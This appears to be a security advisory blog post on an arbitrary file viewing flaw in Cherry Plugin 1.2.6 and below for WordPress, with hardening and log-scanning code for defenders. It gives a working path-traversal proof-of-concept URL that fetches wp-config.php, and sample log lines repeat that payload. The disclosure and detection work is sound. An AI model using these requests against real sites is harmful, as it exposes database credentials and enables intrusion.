One of the things that we do to keep track of the plugin vulnerabilities out there is to monitor hacking attempts on our websites. That sometimes leads us to find what looks to be exploitation of vulnerabilities that a hacker has only just discovered. In other cases it shows really old vulnerabilities that hackers are still trying to exploit. We have recently had some attempts to exploit a couple of vulnerabilities in older versions of the plugin Cherry Plugin. One was an arbitrary file upload vulnerability mentioned here and the other was an arbitrary file viewing vulnerability that we couldn’t find any prior mention of.
In version 1.2.6 and below, the file /admin/import-export/download-content.php serves up the contents of whatever file is requested. That functionality appears to have been intended to be accessible only by admins, but there were no restrictions in place to prevent anyone else from accessing it.
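The two checks that were missing, shown in Python as an added illustration rather than the plugin's own PHP: the handler first requires an administrator flag (here a plain is_admin parameter, an assumption standing in for the application's capability check) and then only serves files that resolve inside a fixed export directory, so a requested path such as ../../../../../wp-config.php is refused. The directory layout it builds is constructed for the example.

```python
import os
import tempfile


def resolve_within(base_dir: str, requested: str):
    """Return the real path of `requested` only if it lies inside `base_dir`.

    Absolute paths, empty names and anything that escapes the base
    directory (including via symlinks) return None.
    """
    if not requested or os.path.isabs(requested):
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses ".." components and follows symlinks, so the
    # containment test below sees where the file really is
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def serve_export(base_dir: str, requested: str, is_admin: bool) -> bytes:
    """Hardened counterpart of an export-download handler.

    `is_admin` is an assumption standing in for the application's own
    capability check; the authorisation test runs before any path work.
    """
    if not is_admin:
        raise PermissionError("export download is restricted to administrators")
    path = resolve_within(base_dir, requested)
    if path is None or not os.path.isfile(path):
        # same error for "outside the export directory" and "does not exist",
        # so the response does not reveal which one applied
        raise FileNotFoundError(requested)
    with open(path, "rb") as fh:
        return fh.read()


def denied_without_admin(base_dir: str, requested: str) -> bool:
    """True if the handler refuses a non-admin before touching the filesystem."""
    try:
        serve_export(base_dir, requested, is_admin=False)
    except PermissionError:
        return True
    return False


def make_demo_tree() -> str:
    """Build a throwaway layout: <root>/wp-config.php next to <root>/exports/.

    Returns the export directory. Constructed for this example only.
    """
    root = tempfile.mkdtemp(prefix="cherry-demo-")
    exports = os.path.join(root, "exports")
    os.mkdir(exports)
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php define('DB_PASSWORD', 'example-secret');\n")
    with open(os.path.join(exports, "export.xml"), "w") as fh:
        fh.write("<export/>")
    return exports


if __name__ == "__main__":
    exports = make_demo_tree()
    print(serve_export(exports, "export.xml", is_admin=True))
    for bad in ("../wp-config.php", "../../../../../wp-config.php", "/etc/passwd"):
        print(bad, "->", resolve_within(exports, bad))
    print("non-admin refused:", denied_without_admin(exports, "export.xml"))
```

The containment test compares real paths, not the string the client sent, which is what makes it hold up against ".." sequences and symlinks alike; the authorisation check sits in front of it because a path check alone would still let any visitor download legitimate exports.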
Proof of Concept
The following proof of concept will download the website’s wp-config.php file.
Make sure to replace “[path to WordPress]” with the location of WordPress:
http://[path to WordPress]/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
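To find attempts like the one above in a web server's access log, here is an added Python example (not from the original post) that parses combined-format log lines, picks out requests to download-content.php, and flags any file parameter that is absolute or contains a parent-directory component. The log lines, addresses and timestamps are constructed for the example; a 200 status with a non-trivial byte count on a flagged line means the file was most likely served.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access log line: client, identd, user, [time], "request", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
ENDPOINT = "/admin/import-export/download-content.php"
# a ".." path component anywhere in the value (backslashes are normalised first)
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')


def suspicious_file_param(target: str):
    """Return the decoded `file` value if `target` asks the download endpoint
    for a path that leaves its own directory, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return None
    # parse_qs percent-decodes, so an encoded "../" is seen the way PHP sees it
    for value in parse_qs(parts.query, keep_blank_values=True).get("file", []):
        value = value.replace("\\", "/")
        if value.startswith("/") or TRAVERSAL.search(value):
            return value
    return None


def scan(lines):
    """Return one record per access-log line that looks like an exploitation attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        value = suspicious_file_param(m.group("target"))
        if value is not None:
            hits.append({"ip": m.group("ip"), "time": m.group("time"),
                         "status": m.group("status"), "file": value})
    return hits


# Constructed sample log: documentation-range addresses, arbitrary dates
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2016:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2016:13:55:40 +0000] "GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1" 200 3107
198.51.100.7 - - [10/Oct/2016:14:02:01 +0000] "GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=%2e%2e%2fwp-config.php HTTP/1.1" 200 3107
192.0.2.9 - - [10/Oct/2016:14:10:00 +0000] "GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=export.xml HTTP/1.1" 200 2200
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f'{hit["time"]} {hit["ip"]} status={hit["status"]} file={hit["file"]}')
```

The endpoint match is on the path suffix rather than the full URL so the rule works whatever directory WordPress is installed in, and the legitimate export.xml request at the end is deliberately left unflagged so the rule can be tuned against normal admin traffic before it is deployed.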